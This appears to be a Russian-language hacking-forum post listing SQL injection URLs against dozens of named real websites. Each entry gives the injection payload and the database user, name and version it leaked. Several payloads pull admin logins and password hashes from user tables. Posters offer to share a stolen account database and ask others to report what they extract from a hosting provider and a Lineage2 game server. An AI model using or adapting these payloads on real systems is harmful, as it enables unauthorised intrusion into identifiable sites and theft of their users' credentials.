SQL Инъекции

PostgreSQL 8.1.5 on i386-pc-solaris2.10, compiled by GCC gcc (GCC) 3.4.6:5432:sgc

 

www.fanbay.se
Что-то про фильмы музыку итд.

Code:

5.0.27-community-nt

 

PR 5

PR 4

PR 4

 

User: visitor@localhost
Database: butilka
Version: 5.0.70-log

 

Code:

http://www.asp.wroc.pl/wyswietl_konkurs.php?id=-202+UNION SELECT CONCAT_WS(CHAR(32,58,32),user(),database(),version()),2,3,4,5,6--

asp@localhost : asp_site : 4.1.22-log

Code:

http://www.usbe.umu.se/news/news_eng.php?ID=-00000001644+UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3--

usbe_webb@localhost : USBE_news : 5.0.54-log

 

Code:

http://slovco.ru/sovremslov/yu/podrobno.php?id=-536+union+select+1,2,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,4,5--

root@localhost:slovco:5.0.60-log

 

HTML:

http://www.altaservisnsk.ru/index.php?id=-6+union+select+1,concat_ws(0x3a,version(),database(),user())--

5.0.81-community:ipdenis_altaservis:ipdenis_admin@localhost

HTML:

http://www.deti.spb.ru/writers_rus/?a_id=-121+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17--

5.0.33:deti_test:deti@localhost

HTML:

http://shoprusbook.ru/ulist.php?g=-109597+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17--

5.0.67

 

Apache/2.2.8 (Fedora)
PHP/5.2.6

Code:

http://spartak.tambovsport.ru/champ/online.php?id=63'

Code:

http://spartak.tambovsport.ru/champ/online.php?id=63+and+1=0+ Union Select   UNHEX(HEX([visible]))  ,2,3,4,5,6

6 columns​

user

HTML:

tambovsport@localhost

Database

HTML:

tambovsport

 

http://wordtrans.org/engine/index.php?action=docs&name=-clients'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+--+

http://www.nwinnovation.com/showjob.php?id=2493+union+select+1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13+from+information_schema.tables+group+by+table_schema+/*+


http://www.gamachejobs.com/showjob.php?jobid=-135+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+--+


http://www.51hengtianran.com/en/showjob.php?id=89&idd=-6+union+select+1,2,3,4,5,6,7,8+from+admin+/*+

http://hrjobs.com/showjob.php?id=-1+union+select+1,2,concat_Ws(0x3a3a,id,passwd,LEVEL,lastseen),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+users+--+

 

Server:

Code:

http://www.kiev.attrade.ru/str/news?yy=2008+and+1=cast((SELECT+version()||chr(58)||current_user||chr(58)||current_database())+as+int)-- 

TABLES:

Code:

http://www.kiev.attrade.ru/str/news?yy=2008+and+1=cast((SELECT TABLE_NAME from INFORMATION_SCHEMA.TABLES LIMIT 1 OFFSET 193)+as+int)--

COLUMNS:

Code:

http://www.kiev.attrade.ru/str/news?yy=2008+and+1=cast((SELECT COLUMN_NAME from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=chr(117) || chr(115) || chr(101) || chr(114) || chr(97) || chr(99) || chr(99) || chr(111) || chr(117) || chr(110) || chr(116) || chr(115) LIMIT 1 OFFSET 1)+as+int)--

P.S.: tnx Ins3t за помощь с Psql

 

PHP:

5.0.45-log

PHP:

PHP/5.2.0-8+etch15

User

PHP:

fifakulte@localhost

Database

PHP:

fifakultecom1

PHP:

Columns 12

Code:

http://www.fifakulte.com/online.php?id=896+and+1=0+ Union Select  1 , UNHEX(HEX([visible])) ,3,4,5,6,7,8,9,10,11,12

P.S Кому нужно могу базу акков скинуть оттуда. Но врятли кому надо)

 

Code:

http://www.sugar-free-games.com/showgame.php?game=-1145+union+select+1,group_concat(table_name,0x3c62723e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+where+table_schema=database()

 

Скулка на хостинге. Если чего наковыряете напишите мне в лс.

Code:

PHP/5.2.0-8+etch15

User

Code:

hostacci_client@localhost

Database

Code:

hostacci_client

Columns

Code:

5

Code:

http://www.hostaccion.com/?p=contrato-online.php&id=13+and+1=0+ Union Select   UNHEX(HEX([visible]))  ,2,3,4,5

 

Code:

http://www.marketcatalog.info/news.php?newsId=-78+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7--

http://www.torgovec.com/news.php?newsId=-967+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7--

http://www.alloffshore.net/news.php?newsId=-967+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7--

на 1 хосте)
5.0.37-standard:admin_ecommerce:admin_ulisss@localhost

Code:

http://my-sky.org/news.php?form_id=-47+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6--&form_current_page=0

5.0.45-Debian_1-log:myskyorg:myskyorg@localhost

Code:

http://ukrsvit.net/news.php?id=-354+UNION+SELECT+1,2,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64)

см подробнее к 1 картинке =)
5.0.70-log/**/ukrsvit/**/ukrsvit@localhost

Code:

http://seowars.ru/seo-news/news.php?id_news=-585+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14

тайтл
5.0.81-community:seowars_base:seowars_user@localhost

Code:

http://playgame.org.ua/news.php?id=-673+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15

4.1.22-log:freemp3_slovo:[email protected]

 

celticarts.org pr5
The Celtic Arts Foundation

Code:

http://www.celticarts.org/index.php?page_id=4+and+substring(version(),1,1)=4+--+

4.1.22-standard | celticar_user@localhost

 

Code:

http://www.lagam.net/?page=7&itemId=-600+union+select+concat_ws(0x3a,concat_ws(0x3a,user(),version()),database())/*

ТИЦ: 10
PR: 2

User: status@localhost
Version: 4.1.22-community-nt
Name: l2jdb


Игровой сервер lineage2 =)

PS по серверам ла2 был опыт, все данные интересные лежат в таблице accounts (обычно логин, hash sha-1(base64) и мыло), но тут почему то доступа нет, если кто найдет способ - отпишите пожалуйста в пм.

 

Code:

http://www.halal-world.com/category.php?IndustryID=14+union+select+1,2,concat_ws(0x3a,loginid,password)+from+admin--

--------

 

http://www.lapythie.free.fr/news/news.php?id=9999999999999999+union+select+1,2,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,4,5,6,7,8--

 

http://www.erasmus-entrepreneurs.eu/page.php?pid=777777771'+union+select+1,2,3,version(),5,6/*